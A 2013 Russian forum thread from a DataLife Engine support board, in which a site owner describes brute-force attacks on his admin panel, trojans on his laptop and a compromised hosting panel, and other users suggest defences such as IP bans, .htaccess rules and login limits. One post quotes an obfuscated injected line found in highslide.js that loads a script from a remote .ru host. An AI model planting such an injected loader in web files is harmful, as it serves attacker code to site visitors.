izbushkin 3 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 (изменено) Сейчас чисто случайно зашел в раздел: и вот что я вижу: И такая мутатень уже на протяжении почти суток оказывается! Очень настырно подбирается пароль к аккаунту админа! Положил данный ай-пи в фильтр IP адреса: Попытки авторизоваться прекратились!!! Наверное взломщик оценил систему безопасности. Ух ты!!! Бан по ай-пи не помог. Попытки авторизоваться продолжаются: Что делать? Изменено 22 июня 2013 пользователем izbushkin Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 А адрес админки меняли? Если не менять то как минимум можно получить порядка 5-100 попыток входа с разных IP. Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Автор Немного не понял по поводу адреса админки? Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Админка- Настройка системы-Настройки безопасности скрипта-Файл админпанели (Вы можете изменить имя файла админпанели. По умолчанию это admin.php,если вы указываете новый файл, то не забудьте переименовать его на сервере, указывается только имя файла, без указания пути к нему.) Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Автор Файл у меня изменен давно на другой. Доступ к админпанели для всех пользователей закрыт, кроме меня одного. Пока решил проблему путём смены логина админа, ну и пароль навсякий сменил. Файл админки тоже переименовал навсякий. Пока всё ОК!Там скорее всего прога какая то долбила... Что то не верится что человек уже почти сутки заморачивается с перерывами в 20 минут Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 с перерывами в 20 минут Вот жаль нет в настройках времени, по идее вынести в настройки этот параметр. Я бы просто больший промежуток поставил... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 994 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Бан по ай-пи не помог. Попытки авторизоваться продолжаются: Банить нужно не в скрипте DLE, а на сервере. Потому как бан в DLE не только по IP, но и по логину, поэтому он сначала авторизовывает, а потом проверяет и банит. Поэтому добавив бан в DLE, попытки авторизации также фиксируются и только после этого наступает бан. Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Автор Вобщем попытка взломать аккаунт на сайте не удалось. Эти уроды принялись взламывать мой ноутбук. Прямо на моих глазах в почте майл.ру была добавлена вот эта функция: Кнопку "ВЫКЛ." - это уже я нажал. Далее смотрим на настройки фильтра: Я просто в шоке!!! Касперский не помогает! Может винда-8 с дыркой??? Как ломают комп то?Кстати это уже вторая попытка взлома ноутбука и вследвие сервера. Первая удалась успехом хакеров.Что и требовалось доказать. Уже взломали панель управления сайтами с ай-пи 176.9.227.94Утилита AVZ нашла 5 троянов на ноуте. Цитата Ссылка на сообщение Поделиться на других сайтах
lineup 5 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Переходите на линукс, так бы взломщики автоматически перестали быть взломщиками =) Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 22 июня 2013 Рассказать Опубликовано: 22 июня 2013 Автор Как? Как они узнают логин от панели хостинга? Меняют пароли и авторизуются.. Я просто не понимаю: Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 24 июня 2013 Рассказать Опубликовано: 24 июня 2013 Автор Сегодня обнаружил на сайте при помощи штатного антивируса изменения в файле: /engine/classes/highslide/highslide.jsвот такой код: ...Anchors)}; ;document.write('<s'+'cr'+'ipt src=ht'+'tp://'+'vvv'+'.posnv'+'aggs.r'+'u/4'+'7.j'+'s></sc'+'ri'+'pt>');Вот обнаружил в логах: Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 994 Опубликовано: 24 июня 2013 Рассказать Опубликовано: 24 июня 2013 Как? Как они узнают логин от панели хостинга? У вас их воруют. Способов много, начиная от троянов на компьютере, и использования нелегального ПО на компьютере, где трояны вшиты и сами отсылают ваши пароли и заканчивая использованием одинаковых паролей на разных сайтах. Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 19 сентября 2013 Рассказать Опубликовано: 19 сентября 2013 (изменено) Автор После некоторого перерыва опять сейчас за метил, что на всех сайтах на сервере в журнале операций в админпанели происходит подбор пароля к аккаунту. И как оказалось это происходит на протяжении почти месяца. А я и не знал даже. Подскажите пожалуйста как сделать, чтобы запретить данному ай-пи подбирать пароли к админке? Нашел статью: Запрет доступа по IP через .htaccess Куда надо прописать данные: Order allow,deny allow from all Deny from 193.105.154.231 Изменено 19 сентября 2013 пользователем izbushkin Цитата Ссылка на сообщение Поделиться на других сайтах
dampel 0 Опубликовано: 19 сентября 2013 Рассказать Опубликовано: 19 сентября 2013 Используйте брандмауэр вашего сервера для эффективного бана. IPTABLES для .htaccess используйте примерно такую строчку deny from (ip нарушителя) Бан через админку dle не спасетdeny from 193.105.154.231 в самый конец .htaccess Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 20 сентября 2013 Рассказать Опубликовано: 20 сентября 2013 Не хранить пароли на ноуте или компе ни в каком виде... Я когда то хранил, потом гуляя в своей почту на моих глазах приходило письмо от какой то партнерки, я его типа прочитал, оно типа удалилось и всякие такие приколы были... Записал пароли на бумажку, сфоткал на телефон, бумажку сжег... Проблем теперь нет, тьфу тьфу тьфу Цитата Ссылка на сообщение Поделиться на других сайтах
vadimushka_d 0 Опубликовано: 20 сентября 2013 Рассказать Опубликовано: 20 сентября 2013 поставить линукс, либо нормальный антивирус, и сделать запрос на запрет передачи любых данных с компа, без разрешения владельца компа, Цитата Ссылка на сообщение Поделиться на других сайтах
zimka 1 Опубликовано: 21 сентября 2013 Рассказать Опубликовано: 21 сентября 2013 Во первых для начала нужно удалить трояны с компа.... во вторых храните пароли на столе в блокноте а не в компе... у вас пароли просто воруют... вы поменяли ввели новый а его тут же троян отправил злоумышленнику... Цитата Ссылка на сообщение Поделиться на других сайтах
alex32 934 Опубликовано: 21 сентября 2013 Рассказать Опубликовано: 21 сентября 2013 а я чо то не парюсь. мой хостер все вопросы решил тупо, и не поверите, как отрезало. ломают то не люди, пароли подбирают боты. просто при заходе в админку, для того, что бы получить доступ к форме ввода логина и пароля надо ввести сначала другой логин и пароль, прописанный в хтаццесс. тупой, типа, user/1234 зато админку не ломаютВ логах ни одной попытки взлома, они тупо туда не добираются Цитата Ссылка на сообщение Поделиться на других сайтах
bonzik 0 Опубликовано: 8 октября 2013 Рассказать Опубликовано: 8 октября 2013 Так же, позволю себе порекомендовать, можно поставить ограниченные попытки логина на сайте...поставьте 2-3 и через пару недель они отвяжутся. Цитата Ссылка на сообщение Поделиться на других сайтах
izbushkin 3 Опубликовано: 17 октября 2013 Рассказать Опубликовано: 17 октября 2013 Автор Решил проблему полностью установив в настройках метод авторизации по E-mail Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.